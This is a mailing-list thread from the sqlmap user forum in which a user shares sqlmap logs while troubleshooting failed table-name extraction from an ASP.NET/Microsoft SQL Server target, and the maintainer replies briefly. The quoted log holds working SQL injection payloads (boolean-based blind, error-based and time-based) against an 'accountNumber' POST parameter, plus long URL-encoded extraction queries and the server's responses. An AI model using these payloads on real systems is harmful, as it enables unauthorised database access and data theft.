Re: [sqlmap-users] problems extracting table names
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] problems extracting table names
|
From: Miroslav S. <mir...@gm...> - 2013-02-25 11:48:10
|
Hi. Maybe web server has a treshold value for a parameter value length. This looks like such case. Kind regards, Miroslav Stampar Dana 22.2.2013. 02:23 "Brian Milliron" <Br...@ec...> je napisao/la: > SQlmap is able to extract db names, current user and backend info, but > when I try to get tables I end up with junk data or nothing at all. I > find this strange because SQLmap has identified multiple injection > methods and I am on a fast local connection with the target server. > This is the log file with examples of good/bad data. > > sqlmap identified the following injection points with a total of 118915 > HTTP(s) requests: > --- > Place: POST > Parameter: accountNumber > Type: boolean-based blind > Title: Generic boolean-based blind - Parameter replace (original > value) > Payload: accountNumber=(SELECT (CASE WHEN (4906=4906) THEN 1111111 > ELSE 1/(SELECT 0) > END))&meterNumber=1111111&zipCode=78451&email=te...@te... > ®ister=Register > > Type: error-based > Title: Microsoft SQL Server/Sybase error-based - Parameter replace > Payload: > > accountNumber=(CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(109)+CHAR(100)+CHAR(58)+(SELECT > (CASE WHEN (3149=3149) THEN CHAR(49) ELSE CHAR(48) > > END))+CHAR(58)+CHAR(100)+CHAR(111)+CHAR(103)+CHAR(58))))&meterNumber=1111111&zipCode=78451&email= > te...@te...®ister=Register > > Type: AND/OR time-based blind > Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) > Payload: accountNumber=-9196 OR 8333=(SELECT COUNT(*) FROM sysusers > AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS > sys5,sysusers AS sys6,sysusers AS > sys7)&meterNumber=1111111&zipCode=78451&email=te...@te... > ®ister=Register > --- > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0 > back-end DBMS: Microsoft SQL Server 2008 > available databases [21]: > [redacted] > current user: [redacted] > current database: [redacted] > current user is DBA: False > > [6 tables] > > +------------------------------------------------------------------------------------------------------------------------ > | dbo.[??4c0?4A00370?520?22??2d0040005a??00??2A??58??5f0?0d00000?3c??2 > | > |dbo.[\n\n] > | > |dbo.[\n\n] > | > dbo.[\n\n] > > dbo.[\n\n] > > +------------------------------------------------------------------------------------------------------------------------ > > When I use --no-cast and --hex flags I get no data at all and when I > don't use them I get junk data. When I look at the raw request/response > in every case I see sqlmap send a test request with no injection which > generates a 200 response, then follows an attempt to read the number of > tables which generates a 500 error with a number in the error message. > Every follow on request generates a 200 OK response, which means that > neither boolean nor error based methods are working and it falls back to > time based which then also fails. Of all the correct data gathered so > far, all was through error messages. However, specifying --technique=E > --parse-errors does not gain any additional info. Some selected > examples from the logs related to this attempt follow: > > > ./sqlmap.py -r /root/request --fresh-queries -o --hex --no-cast -D > master --tables -t ~/sqlmap > > [WARNING] it was not possible to count the number of entries for the SQL > query provided. sqlmap will assume that it returns only one entry > [WARNING] in case of continuous data retrieval problems you are advised > to try a switch '--no-cast' and/or switch '--hex' > [CRITICAL] unable to retrieve the tables for any database > [WARNING] HTTP error codes detected during run: > 500 (Internal Server Error) - 18 times > > > %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master.. > sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name > %29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29 > > HTTP response [#2] (500 Internal Server Error): > [Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when > converting the nvarchar value ':omd:0x00000167:dog:' to data type int. > > > %28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29%2B%28SELECT%20TOP%201%20SUBSTRING%28%28master.sys.fn_varbintohexstr%28CAST%28master.. > sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name > %20AS%20VARBINARY%28MAX%29%29%29%29%2C1%2C100%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20AND%20master.sys.fn_varbintohexstr%28CAST%28master.. > sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name > %20AS%20VARBINARY%28MAX%29%29%29%20NOT%20IN%20%28SELECT%20TOP%200%20master.sys.fn_varbintohexstr%28CAST%28master.. > sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name > %20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%20ORDE > R%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster..sysobjects.name > %29%20ORDER%20BY%20master..sysusers.name%2BCHAR%2846%29%2Bmaster.. > sysobjects.name > %29%2BCHAR%2858%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29 > > HTTP response [#3] (200 OK): > > > ------------------------------------------------------------------------------ > Everyone hates slow websites. So do we. > Make your web apps faster with AppDynamics > Download AppDynamics Lite for free today: > http://p.sf.net/sfu/appdyn_d2d_feb > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
